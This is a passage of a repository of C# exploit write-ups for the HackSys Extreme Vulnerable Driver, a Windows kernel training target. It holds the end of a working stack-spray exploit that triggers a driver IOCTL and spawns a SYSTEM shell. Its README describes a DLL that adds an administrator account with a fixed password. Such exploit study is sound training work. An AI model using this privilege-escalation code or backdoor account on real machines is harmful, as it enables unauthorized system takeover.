242 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
243 |
244 | // Step 2: Open driver's handle
245 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
246 | uint GENERIC_READ = 0x80000000;
247 | uint GENERIC_WRITE = 0x40000000;
248 | uint FILE_SHARE_READ = 0x00000001;
249 | uint FILE_SHARE_WRITE = 0x00000002;
250 | uint OPEN_EXISTING = 0x3;
251 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
252 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
253 | IntPtr invalid = new IntPtr(-1);
254 |
255 | Console.WriteLine("[>] Opening {0}", deviceName);
256 | hDevice = CreateFile(
257 | deviceName, GENERIC_READ | GENERIC_WRITE,
258 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
259 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
260 |
261 | if (hDevice == invalid)
262 | {
263 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
264 | return;
265 | }
266 |
267 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
268 |
269 | // Step 3: Stack spray and trigger vulnerability
270 | uint ioctl = 0x22202F;
271 | byte[] payload = BitConverter.GetBytes(0xdeadbeef);
272 | int BytesReturned = 0;
273 | byte[] StackSprayPayload = new byte[1024 * Marshal.SizeOf(typeof(IntPtr))];
274 | byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
275 | int destination;
276 | int size = Marshal.SizeOf(typeof(IntPtr));
277 |
278 | for (int i = 0; i < 1024; i++)
279 | {
280 | destination = i * Marshal.SizeOf(typeof(IntPtr));
281 | Buffer.BlockCopy(pointer, 0, StackSprayPayload, destination, size);
282 | }
283 |
284 | Console.WriteLine("[>] Stack spraying and triggering vulnerability");
285 | NtMapUserPhysicalPages(IntPtr.Zero, 1024, StackSprayPayload);
286 | bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
287 |
288 | if (!status)
289 | {
290 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
291 | CleanUp();
292 | return;
293 | }
294 |
295 | CleanUp();
296 |
297 | // Step 4: Spawn SYSTEM shell
298 | if (IsSystem() && SpawnShell())
299 | {
300 | Console.WriteLine("[+] Exploit is completed successfully");
301 | }
302 | else
303 | {
304 | Console.WriteLine("[-] Failed to exploit");
305 | }
306 | }
307 | }
308 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("UninitializedStackVariable")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("UninitializedStackVariable")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d583fb11-8f46-410a-abf3-45ce8c5966ca")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/UninitializedStackVariable.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}
8 | Exe
9 | UninitializedStackVariable
10 | UninitializedStackVariable
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UseAfterFree/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UseAfterFree/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("UseAfterFree")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("UseAfterFree")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("22fac2cb-dc33-4345-816e-1b0caa429484")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UseAfterFree/UseAfterFree.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}
8 | Exe
9 | UseAfterFree
10 | UseAfterFree
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteNull/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteNull/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("WriteNull")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("WriteNull")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2bba4088-90c0-48e7-b68b-205bf5fd1e7e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteNull/WriteNull.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}
8 | Exe
9 | WriteNull
10 | WriteNull
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhere/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhere/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("WriteWhatWhere")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("WriteWhatWhere")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("24b73675-fd84-4db4-9f28-f6fb085450c4")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhere/WriteWhatWhere.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}
8 | Exe
9 | WriteWhatWhere
10 | WriteWhatWhere
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhereGDI/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhereGDI/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("WriteWhatWhereGDI")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("WriteWhatWhereGDI")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("fdd121ce-e7ec-4ed4-909c-7b4191b0d6a5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhereGDI/WriteWhatWhereGDI.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}
8 | Exe
9 | WriteWhatWhereGDI
10 | WriteWhatWhereGDI
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # HackSys Extreme Vulnerable Driver Writeups with CSharp
2 | My writeups for [HackSys Extreme Vulnerable Driver](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver).
3 | All writeups are written with CSharp (except for DLL).
4 | Tested on following OS:
5 |
6 | * [Windows 7 SP1 x86](./HEVD_Win7x86)
7 | * [Windows 10 Version 1903 x64](./HEVD_Win10x64)
8 |
9 | ## Description
10 | ### Windows 7 SP1 x86
11 | To build codes, open [HEVD_Win7x86.sln](./HEVD_Win7x86/HEVD_Win7x86.sln) and run build. All codes are generated in `bin` folder under the home directory.
12 |
13 | | Project Name| Description |
14 | | :--- | :--- |
15 | | [DoubleFetch](./HEVD_Win7x86/DoubleFetch) | Writeup for Double Fetch vulnerability. Multiple CPU core required. |
16 | | [InjectLib](./HEVD_Win7x86/InjectLib) | Sample DLL for Insecure Kernel Resource Access vulnerability. This DLL attempts to add `hevdtest` user with password `Password123!` and add `hevdtest` to `Administrators` group. |
17 | | [InsecureKernelResourceAccess](./HEVD_Win7x86/InsecureKernelResourceAccess) | Writeup for Insecure Kernel Resource Access vulnerability. DLL for DLL Hijacking is required. |
18 | | [IntegerOverflow](./HEVD_Win7x86/IntegerOverflow) | Writeup for Integer Overflow vulnerablity. |
19 | | [NullPointerDereference](./HEVD_Win7x86/NullPointerDereference) | Writeup for Null Pointer Dereference vulnerablity. |
20 | | [PoolOverflow](./HEVD_Win7x86/PoolOverflow) | Writeup for Pool Overflow vulnerablity. |
21 | | [StackOverflow](./HEVD_Win7x86/StackOverflow) | Writeup for Stack Overflow vulnerablity. |
22 | | [StackOverflowGS](./HEVD_Win7x86/StackOverflowGS) | Writeup for Stack Overflow vulnerablity with Stach Canary. |
23 | | [TypeConfusion](./HEVD_Win7x86/TypeConfusion) | Writeup for Type Confusion vulnerablity. |
24 | | [UninitializedHeapVariable](./HEVD_Win7x86/UninitializedHeapVariable) | Writeup for Uninitialized Heap Variable vulnerablity. |
25 | | [UninitializedStackVariable](./HEVD_Win7x86/UninitializedStackVariable) | Writeup for Uninitialized Stack Variable vulnerablity. |
26 | | [UseAfterFree](./HEVD_Win7x86/UseAfterFree) | Writeup for Use-After-Free vulnerablity. |
27 | | [WriteNull](./HEVD_Win7x86/WriteNull) | Writeup for Write NULL vulnerablity. |
28 | | [WriteWhatWhere](./HEVD_Win7x86/WriteWhatWhere) | Writeup for Arbitrary Overwrite vulnerablity. |
29 | | [WriteWhatWhereGDI](./HEVD_Win7x86/WriteWhatWhereGDI) | Writeup for Arbitrary Overwrite vulnerablity with GDI memory leak. |
30 |
31 | ### Windows 10 Version 1903 x64
32 | To build codes, open [HEVD_Win10x64.sln](./HEVD_Win10x64/HEVD_Win10x64.sln) and run build. All codes are generated in `bin` folder under the home directory.
33 |
34 | | Project Name| Description |
35 | | :--- | :--- |
36 | | [ArbitraryIncrement](./HEVD_Win10x64/ArbitraryIncrement) | Writeup for Arbitrary Increment vulnerablity. |
37 | | [ArbitraryReadWrite](./HEVD_Win10x64/ArbitraryReadWrite) | Writeup for Arbitrary Read and Write vulnerablity. |
38 | | [ArbitraryWrite](./HEVD_Win10x64/ArbitraryWrite) | Writeup for Arbitrary Overwrite vulnerablity. |
39 | | [InjectLib](./HEVD_Win10x64/InjectLib) | Sample DLL for Insecure Kernel Resource Access vulnerability. This DLL attempts to add `hevdtest` user with password `Password123!` and add `hevdtest` to `Administrators` group. |
40 | | [InsecureKernelResourceAccess](./HEVD_Win10x64/InsecureKernelResourceAccess) | Writeup for Insecure Kernel Resource Access vulnerability. DLL for DLL Hijacking is required. |
41 |
42 | ## Acknowledgments
43 | * HackSys Team ([@HackSysTeam](https://twitter.com/HackSysTeam))
44 | * b33f ([@FuzzySec](https://twitter.com/FuzzySec))
45 |
--------------------------------------------------------------------------------